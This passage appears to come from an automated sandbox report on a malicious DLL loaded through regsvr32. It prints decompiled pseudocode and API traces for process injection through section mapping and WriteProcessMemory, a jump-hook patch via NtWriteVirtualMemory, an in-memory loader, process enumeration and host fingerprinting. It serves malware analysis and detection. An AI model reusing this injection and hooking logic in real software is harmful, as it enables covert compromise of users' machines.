                  • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                  • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                  • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                    • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                  • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                  • NtClose.NTDLL(00000000), ref: 1000C8F5
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                  • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                  • API String ID: 2002808388-2319545179
                  • Opcode ID: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
                  • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
                  • Opcode Fuzzy Hash: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
                  • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 82%
                  			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}




















                  0x10005f82
                  0x10005f92
                  0x10005f9c
                  0x100060d0
                  0x100060c3
                  0x00000000
                  0x100060c5
                  0x100060d7
                  0x10006098
                  0x00000000
                  0x10006098
                  0x10005fa2
                  0x10005faa
                  0x10005fb1
                  0x10005fb3
                  0x00000000
                  0x10005fc6
                  0x10005fc6
                  0x10005fcc
                  0x10005fd2
                  0x10005fe2
                  0x10005fe7
                  0x10005fef
                  0x10005ff7
                  0x10006013
                  0x10006018
                  0x1000601b
                  0x1000601d
                  0x1000601f
                  0x1000602c
                  0x10006035
                  0x1000603e
                  0x10006043
                  0x10006044
                  0x10006052
                  0x1000605c
                  0x1000606d
                  0x10006072
                  0x10006079
                  0x10006080
                  0x10006083
                  0x1000608f
                  0x10006090
                  0x1000609c
                  0x100060a5
                  0x100060b7
                  0x100060ba
                  0x100060c1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x100060c1
                  0x10006092
                  0x10006097
                  0x00000000
                  0x10005ff7

                  APIs
                  • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                  • SetLastError.KERNEL32(000000AA), ref: 100060D7
                    • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                    • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                    • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                  • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                  • GetLastError.KERNEL32 ref: 10005FEF
                  • memset.MSVCRT ref: 10006013
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                  • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                  • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                  • String ID: Hello qqq
                  • API String ID: 3435743081-3610097158
                  • Opcode ID: 6d402a79815b98af21a7f787fe15b69dd9dc40bdd27b4757cb6b1cb9915066dd
                  • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
                  • Opcode Fuzzy Hash: 6d402a79815b98af21a7f787fe15b69dd9dc40bdd27b4757cb6b1cb9915066dd
                  • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1007792E, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 149 1007792e-1007797a 151 10077984-1007798a 149->151 152 1007797c-10077982 149->152 153 1007798f-10077994 151->153 154 100779a3-100779cb 152->154 155 10077996-1007799b 153->155 156 1007799d 153->156 157 10077a0f-10077ad5 VirtualAlloc call 10077685 call 10077655 VirtualAlloc call 100775dd VirtualFree 154->157 158 100779cd-100779cf 154->158 155->153 156->154 166 10077ad7-10077af1 call 10077685 157->166 167 10077af2-10077afe 157->167 158->157 159 100779d1-10077a0b VirtualAlloc 158->159 159->157 166->167 168 10077b05 167->168 169 10077b00-10077b03 167->169 172 10077b08-10077b23 call 10077655 168->172 169->172 175 10077b25-10077b38 call 10077534 172->175 176 10077b3d-10077b6c 172->176 175->176 178 10077b82-10077b8d 176->178 179 10077b6e-10077b7c 176->179 181 10077b8f-10077b98 178->181 182 10077ba8-10077bc5 VirtualProtect 178->182 179->178 180 10077b7e 179->180 180->178 181->182 185 10077b9a-10077ba2 181->185 183 10077bc7-10077bd3 182->183 184 10077bfa-10077cb1 call 100777b7 call 10077749 call 100777ed VirtualProtect 182->184 187 10077bd5-10077bec VirtualProtect 183->187 196 10077cb7-10077cdc 184->196 185->182 186 10077ba4 185->186 186->182 189 10077bf0-10077bf8 187->189 190 10077bee 187->190 189->184 189->187 190->189 197 10077ce5 196->197 198 10077cde-10077ce3 196->198 199 10077cea-10077cf5 197->199 198->199 200 10077cf7 199->200 201 10077cfa-10077d12 VirtualProtect 199->201 200->201 201->196 202 10077d14-10077d3b VirtualFree GetPEB 201->202 203 10077d40-10077d47 202->203 204 10077d4d-10077d67 203->204 205 10077d49 203->205 207 10077d6a-10077d93 call 1007785d call 10077d98 204->207 205->203 206 10077d4b 205->206 206->207
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
                  • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
                  • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
                  • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
                  • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
                  Memory Dump Source
                  • Source File: 00000005.00000002.497815135.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
                  • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105nativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 228 1000cb77-1000cb90 call 1000c4ce 231 1000cb96-1000cba4 call 1000c6c0 228->231 232 1000cc69-1000cc70 228->232 231->232 239 1000cbaa-1000cbe1 memset 231->239 233 1000cc80-1000cc87 232->233 234 1000cc72-1000cc79 FreeLibrary 232->234 236 1000cca3-1000cca9 233->236 237 1000cc89-1000cca2 call 1000861a 233->237 234->233 237->236 239->232 244 1000cbe7-1000cc27 NtProtectVirtualMemory 239->244 245 1000cc67 244->245 246 1000cc29-1000cc44 NtWriteVirtualMemory 244->246 245->232 246->245 247 1000cc46-1000cc65 NtProtectVirtualMemory 246->247 247->232 247->245
                  C-Code - Quality: 93%
                  			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x2c2faa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x2c2faa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}
























                  0x1000cb83
                  0x1000cb85
                  0x1000cb87
                  0x1000cb90
                  0x1000cb9b
                  0x1000cba0
                  0x1000cba4
                  0x1000cbb8
                  0x1000cbc0
                  0x1000cbd0
                  0x1000cbd1
                  0x1000cbd6
                  0x1000cbe1
                  0x1000cbe7
                  0x1000cbef
                  0x1000cbfd
                  0x1000cc03
                  0x1000cc04
                  0x1000cc10
                  0x1000cc17
                  0x1000cc27
                  0x1000cc67
                  0x1000cc67
                  0x1000cc46
                  0x1000cc46
                  0x1000cc65
                  0x00000000
                  0x00000000
                  0x1000cc65
                  0x1000cc27
                  0x1000cbe1
                  0x1000cba4
                  0x1000cc69
                  0x1000cc70
                  0x1000cc73
                  0x1000cc79
                  0x1000cc79
                  0x1000cc80
                  0x1000cc87
                  0x1000cc8a
                  0x1000cc8f
                  0x1000cc9c
                  0x1000cca2
                  0x1000cca9

                  APIs
                    • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                    • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                    • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                    • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                    • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                    • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                    • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                  • memset.MSVCRT ref: 1000CBB8
                  • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                  • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                  • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                  • String ID:
                  • API String ID: 317994034-0
                  • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                  • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
                  • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                  • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 248 1000aba3-1000abc7 CreateToolhelp32Snapshot 249 1000ac38-1000ac3e 248->249 250 1000abc9-1000abf2 memset Process32First 248->250 251 1000ac02-1000ac13 call 1000ccc0 250->251 252 1000abf4-1000ac00 250->252 256 1000ac15-1000ac26 Process32Next 251->256 257 1000ac28-1000ac35 CloseHandle 251->257 252->249 256->251 256->257 257->249
                  C-Code - Quality: 100%
                  			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x2c2faa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x2c2faa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}













                  0x1000aba3
                  0x1000abbb
                  0x1000abbd
                  0x1000abc0
                  0x1000abc2
                  0x1000abc7
                  0x1000abd6
                  0x1000abde
                  0x1000abf2
                  0x1000ac02
                  0x1000ac08
                  0x1000ac0d
                  0x1000ac13
                  0x00000000
                  0x00000000
                  0x1000ac15
                  0x1000ac26
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000ac26
                  0x1000ac2e
                  0x1000ac35
                  0x1000abf4
                  0x1000abf4
                  0x1000abfa
                  0x1000abff
                  0x1000abff
                  0x1000abf2
                  0x1000ac3e

                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                  • memset.MSVCRT ref: 1000ABD6
                  • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                  • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                  • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                  • String ID:
                  • API String ID: 1267121359-0
                  • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                  • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
                  • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                  • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}















                  0x1000b7a8
                  0x1000b7b1
                  0x1000b7bd
                  0x1000b7c3
                  0x1000b7c5
                  0x1000b7cd
                  0x1000b7e0
                  0x1000b7ef
                  0x1000b7fa
                  0x1000b807
                  0x1000b821
                  0x1000b826
                  0x1000b828
                  0x1000b82f
                  0x1000b83f
                  0x1000b850
                  0x1000b85a
                  0x1000b862
                  0x1000b869
                  0x1000b86c
                  0x1000b889

                  APIs
                  • memset.MSVCRT ref: 1000B7C5
                  • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                  • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                  • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                    • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                  • lstrcatW.KERNEL32 ref: 1000B85A
                  • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                  • String ID:
                  • API String ID: 3410906232-0
                  • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                  • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                  • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                  • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10028D00, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 275 10028d00-10028d18 276 10028d36 275->276 277 10028d1a-10028d34 275->277 278 10028d3c-10028d4d 276->278 277->278 279 10028d6b-10028d72 278->279 280 10028d4f-10028d69 278->280 281 10028d78-10028d9f 279->281 280->281 282 10028da1-10028db4 281->282 283 10028db6-10028dc6 281->283 284 10028dcc-10028df3 GetSystemDirectoryW 282->284 283->284 285 10028e02-10028e38 VirtualProtectEx 284->285 286 10028df5-10028dfd 284->286 287 10028e54-10028e85 285->287 288 10028e3a-10028e4e 285->288 286->285 289 10028ea0-10028ec3 287->289 290 10028e87-10028e9b 287->290 288->287 291 10028ec5-10028eda 289->291 292 10028edd-10028ef4 289->292 290->289 291->292 293 10028f00-10028f0b 292->293 294 10028f34-10028f57 GetSystemDirectoryW 293->294 295 10028f0d-10028f2a 293->295 297 10028f75-10028fc0 294->297 298 10028f59-10028f6f 294->298 295->294 296 10028f2c-10028f32 295->296 296->293 296->294 300 10028fc5-10028fc9 297->300 298->297 301 10028fcb-10028fe5 300->301 302 10028fef 300->302 303 10028ff2-10029003 301->303 304 10028fe7-10028fed 301->304 302->303 305 10029005-10029015 303->305 306 10029018-1002902c 303->306 304->300 304->302 305->306 307 10029030-10029039 306->307 308 1002903b-10029057 307->308 309 10029059-1002908b 307->309 308->307 308->309 310 10029090-1002909b 309->310 311 100290cb-100290d4 310->311 312 1002909d-100290c1 310->312 312->311 313 100290c3-100290c9 312->313 313->310 313->311
                  APIs
                  • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
                  • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
                  Memory Dump Source
                  • Source File: 00000005.00000002.497767833.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: DirectoryProtectSystemVirtual
                  • String ID:
                  • API String ID: 648172718-0
                  • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
                  • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 1000ca25-1000ca45 call 1000c8fd 317 1000cb73-1000cb76 314->317 318 1000ca4b-1000ca6c call 1000a86d 314->318 321 1000ca72-1000ca74 318->321 322 1000cb63-1000cb72 call 1000861a 318->322 323 1000cb51-1000cb61 call 1000861a 321->323 324 1000ca7a 321->324 322->317 323->322 327 1000ca7d-1000ca7f 324->327 330 1000cb42-1000cb4b 327->330 331 1000ca85-1000ca9b call 1000ae66 327->331 330->321 330->323 334 1000cb00-1000cb04 331->334 335 1000ca9d-1000cab0 call 1000cb77 331->335 336 1000cb06-1000cb08 334->336 337 1000cb2f-1000cb3c 334->337 335->334 342 1000cab2-1000caca 335->342 339 1000cb19-1000cb29 336->339 340 1000cb0a-1000cb10 336->340 337->327 337->330 339->337 340->339 342->334 345 1000cacc-1000cae7 GetLastError ResumeThread 342->345 346 1000cae9-1000caf4 345->346 347 1000cafc-1000cafd CloseHandle 345->347 349 1000caf6 346->349 350 1000caf7 346->350 347->334 349->350 350->347
                  C-Code - Quality: 89%
                  			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x2bb0590
				_t7 = _t38 + 0xac; // 0x245cdb11
				E1000A86D( &_v80,  *_t7 + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x2c2faa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
